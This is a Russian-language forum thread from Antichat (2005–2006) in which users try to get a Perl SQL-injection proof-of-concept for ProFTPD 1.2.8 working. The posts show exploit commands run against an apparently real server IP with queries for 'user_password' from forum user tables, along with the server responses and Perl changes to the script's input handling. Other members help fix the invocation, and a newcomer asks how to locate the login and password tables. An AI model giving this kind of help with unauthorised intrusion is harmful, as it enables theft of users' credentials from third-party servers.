ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

20.04.2005, 13:04
|
|
Постоянный
Регистрация: 24.10.2004
Сообщений: 578
Провел на форуме: 2263418
Репутация:
300
|
|
Сообщение от nerezus
Как же это ты так смог? =)
юзай так:
perl script.pl server query
вот так и пушу :
Код:
C:\perl\bin>perl.exe 1.pl 207.248.240.118 SELECT user_password FROM forum_users;
Proof Of Concept Sql Inject on ProFTPD
Usage: perl poc-sqlftp <target> [1=Alternate query]
C:\perl\bin>
.........
зы ip изменён
|
|
|

20.04.2005, 14:17
|
|
Pagan Heart
Регистрация: 12.08.2004
Сообщений: 3,791
Провел на форуме: 6490435
Репутация:
2290
|
|
начни так:
#!/usr/bin/perl
use IO::Socket;
print "\nInput your IP: ";
my $server = <stdin>;
chop ($server);
print "\nInput your query: ";
my $query = <stdin>;
chop ($query);
и в середине замени print "Sent query to $ARGV[0]\n"; на print "Sent query to $server\n";
Последний раз редактировалось nerezus; 20.04.2005 в 14:20..
|
|
|

20.04.2005, 19:49
|
|
Постоянный
Регистрация: 24.10.2004
Сообщений: 578
Провел на форуме: 2263418
Репутация:
300
|
|
хорошо к серверу он уже конектится
Код:
C:\perl\bin>2.pl
Input your IP: 207.248.240.118
Input your query: SELECT user_password FROM phpbb_users
220 ProFTPD 1.2.8 Server (NewAge FTP Server) [serv.ru]
331 Password required for ')UNION.
530 Login incorrect.
Sent query to 207.248.240.118
[------- Sql Inject Unable
Наверно запрос у меня не правельный ?
или дыру каким то макаром прикрыли
|
|
|

20.04.2005, 21:05
|
|
Pagan Heart
Регистрация: 12.08.2004
Сообщений: 3,791
Провел на форуме: 6490435
Репутация:
2290
|
|
>или дыру каким то макаром прикрыли
если учитывать возраст сплоита 
Последний раз редактировалось nerezus; 20.04.2005 в 21:09..
|
|
|

20.04.2005, 21:29
|
|
Постоянный
Регистрация: 24.10.2004
Сообщений: 578
Провел на форуме: 2263418
Репутация:
300
|
|
лан спасибо запомощь!, буду подругому ковырять 
|
|
|

12.05.2005, 12:17
|
|
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме: 5355463
Репутация:
2258
|
|
Сообщение от Майор
вот так и пушу :
Код:
C:\perl\bin>perl.exe 1.pl 207.248.240.118 SELECT user_password FROM forum_users;
Proof Of Concept Sql Inject on ProFTPD
Usage: perl poc-sqlftp <target> [1=Alternate query]
C:\perl\bin>
.........
зы ip изменён
вот когда так пишет т.е. скрипт не запускается это означает что не все или неправильный параметры передал ты скрипту.А так если анейбл то значит дырки нету =)))
__________________
Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
|
|
|

12.07.2006, 21:32
|
|
Новичок
Регистрация: 13.01.2006
Сообщений: 8
Провел на форуме: 37195
Репутация:
2
|
|
А не подскажете что писать в query ?
|
|
|

12.07.2006, 22:29
|
|
Постоянный
Регистрация: 12.07.2006
Сообщений: 327
Провел на форуме: 1654818
Репутация:
117
|
|
Сообщение от Майор
вот так и пушу :
Код:
C:\perl\bin>perl.exe 1.pl 207.248.240.118 SELECT user_password FROM forum_users;
Proof Of Concept Sql Inject on ProFTPD
Usage: perl poc-sqlftp <target> [1=Alternate query]
C:\perl\bin>
так ты передаёш скрипту не два, а пять параметров. Запрос надо в кавычки.
|
|
|

12.07.2006, 22:55
|
|
Pagan Heart
Регистрация: 12.08.2004
Сообщений: 3,791
Провел на форуме: 6490435
Репутация:
2290
|
|
уууууууу.... охренологи(археологи)... )) тему подняли полуторолетнюю ))
|
|
|

12.07.2006, 23:20
|
|
Новичок
Регистрация: 13.01.2006
Сообщений: 8
Провел на форуме: 37195
Репутация:
2
|
|
Ну дык Интересно ))) Я вот некоторые нюансы не понимаю, а объяснить некому(((
Например: ччто именно я должен вводит в query при использование эксплоита :?
как узнать в какой категории (название) хранится пароль, или логинн пользователя ?
Последний раз редактировалось ПсиХ; 13.07.2006 в 21:18..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|